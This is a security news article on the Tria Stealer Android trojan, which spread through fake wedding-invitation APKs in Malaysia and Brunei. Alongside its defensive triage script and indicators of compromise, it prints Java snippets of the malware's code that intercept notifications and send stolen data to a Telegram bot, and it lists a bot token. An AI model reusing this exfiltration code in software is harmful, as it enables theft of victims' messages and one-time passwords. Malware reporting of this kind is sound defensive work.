Tria Stealer Trojan Exploits Android Phones To Exfiltrate SMS Messages

A newly discovered Android malware campaign, dubbed Tria Stealer, has been targeting users in Malaysia and Brunei since mid-2024.

Leveraging fake wedding invitations as a lure, this Trojan steals sensitive data, including SMS messages, call logs, and app notifications, and exfiltrates it to attackers via Telegram bots.

The campaign has raised significant cybersecurity concerns due to its sophisticated techniques and social engineering tactics.

Cybersecurity analysts at Kaspersky Labs discovered that the malware is distributed as an APK file through personal and group chats on WhatsApp and Telegram.

Delivery through a compromised WhatsApp account (on the left) and through a compromised Telegram account (on the right) (Source – Securelist)

How Tria Stealer Works

Victims are tricked into downloading the app under the guise of viewing a digital wedding invitation.

Upon installation, the malware requests permissions such as android.permission.RECEIVE_SMS, android.permission.READ_CALL_LOG, and android.permission.BIND_NOTIFICATION_LISTENER_SERVICE, granting it access to SMS messages, call logs, and app notifications.

Once installed, the app disguises itself as a system settings application using a gear icon to appear legitimate.

During its first execution, it collects device information (like brand and model) and the victim’s phone number.

Overview of the Tria Stealer campaign (Source – Securelist)

This data is assembled into a string and sent to a Command-and-Control (C2) server via Telegram API calls.

HttpURLConnection httpURLConnection = (HttpURLConnection) new URL(
"https://api.telegram.org/bot<bot_token>/sendMessage").openConnection();
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoOutput(true);
byte[] bytes = ("chat_id=<chat_id>&text=" + collectedData).getBytes(StandardCharsets.UTF_8);
DataOutputStream dataOutputStream = new DataOutputStream(httpURLConnection.getOutputStream());
dataOutputStream.write(bytes);
dataOutputStream.close();

The key features of Tria Stealer include:

  1. SMS and Call Monitoring:
  • The Trojan uses BroadcastReceiver components (SMSMonitor and CallMonitor) to intercept incoming SMS messages and call details.
  • Collected data includes message content, sender information, and SIM slot details for dual-SIM devices.
  2. Notification Interception:
  • The malware intercepts notifications from apps like WhatsApp, Gmail, Outlook, and others using the onNotificationPosted function.
  • Extracted information is combined with device details and sent to Telegram bots.
@Override
public final void onNotificationPosted(StatusBarNotification statusBarNotification) {
    String packageName = statusBarNotification.getPackageName();
    String notificationContent = statusBarNotification.getNotification().extras.getString("android.text");
    sendToTelegram("App: " + packageName + "\nContent: " + notificationContent);
}
  3. Account Hijacking:
  • By intercepting one-time passwords (OTPs) from SMS messages, the malware enables attackers to hijack accounts on platforms like WhatsApp and Telegram.
  • Compromised accounts are used to distribute the malicious APK further or impersonate victims for financial scams.
  4. App-Specific Data Theft:
  • Tria Stealer targets apps such as com.whatsapp (WhatsApp), com.google.android.gm (Gmail), and others by extracting sensitive data from notifications.
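As an added defender-side example (not code from the report or from the malware), the following Python triage helper flags the two traits described above in a decoded APK: the RECEIVE_SMS / READ_CALL_LOG / BIND_NOTIFICATION_LISTENER_SERVICE permission combination in the manifest and a hard-coded Telegram Bot API endpoint in the extracted strings. It assumes the manifest has already been decoded to XML (e.g. with apktool); the sample manifest, package name and bot token are constructed placeholders.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permission set the report says Tria Stealer requests: together they give
# an app SMS, call-log and notification access, i.e. full OTP interception.
SPY_PERMISSIONS = {
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_CALL_LOG",
    "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE",
}

# Telegram Bot API URL with an embedded token (<numeric id>:<secret>), the
# shape of the hard-coded C2 endpoint in the report's exfiltration snippet.
TELEGRAM_BOT_RE = re.compile(r"api\.telegram\.org/bot(\d+):[A-Za-z0-9_-]{30,}")

def declared_permissions(manifest_xml: str) -> set:
    """Permissions from <uses-permission android:name> plus the
    android:permission attribute on <service>, which is where a
    notification listener declares BIND_NOTIFICATION_LISTENER_SERVICE."""
    root = ET.fromstring(manifest_xml)
    perms = {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}
    perms |= {el.get(ANDROID_NS + "permission") for el in root.iter("service")}
    perms.discard(None)
    return perms

def triage(manifest_xml: str, strings: list) -> dict:
    """Static triage of a decoded APK: flag the spyware permission combo
    together with a hard-coded Telegram bot endpoint in its strings."""
    spy = sorted(SPY_PERMISSIONS & declared_permissions(manifest_xml))
    bot_ids = sorted({m.group(1) for s in strings for m in TELEGRAM_BOT_RE.finditer(s)})
    return {
        "spy_permissions": spy,
        "telegram_bot_ids": bot_ids,
        "suspicious": len(spy) >= 2 and bool(bot_ids),
    }

# Constructed sample input (fake package name, placeholder bot token).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.invitation">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <application><service android:name=".NotifListener"
    android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"/>
  </application></manifest>"""
SAMPLE_STRINGS = [
    "https://api.telegram.org/bot1234567890:AAEXAMPLE_FAKE_TOKEN_000000000000/sendMessage",
]
```

The bot id captured from the URL is what you would pivot on when hunting for other samples reporting to the same operator.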

Indicators of Compromise

  • APK Names: Jemputan Perkahwinan.apk, KAD JEMPUTAN PERKAHWINAN.apk
  • File Hashes: de9384577e28c52f8dc690b141098969
  • Telegram Bots: bot7245598298:AAHcn9EndJ-peGQD6a4wBNXhx9HaYmXDGoA

To protect against Tria Stealer, avoid installing APKs from untrusted sources and use reliable mobile security solutions that can detect threats like HEUR:Trojan-Spy.AndroidOS.Agent.*.

Additionally, regularly updating device software helps patch vulnerabilities and enhances security.

By exploiting social engineering tactics and leveraging Telegram for C2 communication, Tria Stealer poses a significant threat to user privacy and security.

Users in Malaysia and Brunei remain primary targets, but the global Android community must remain vigilant against such attacks.


Tushar Subhra Dutta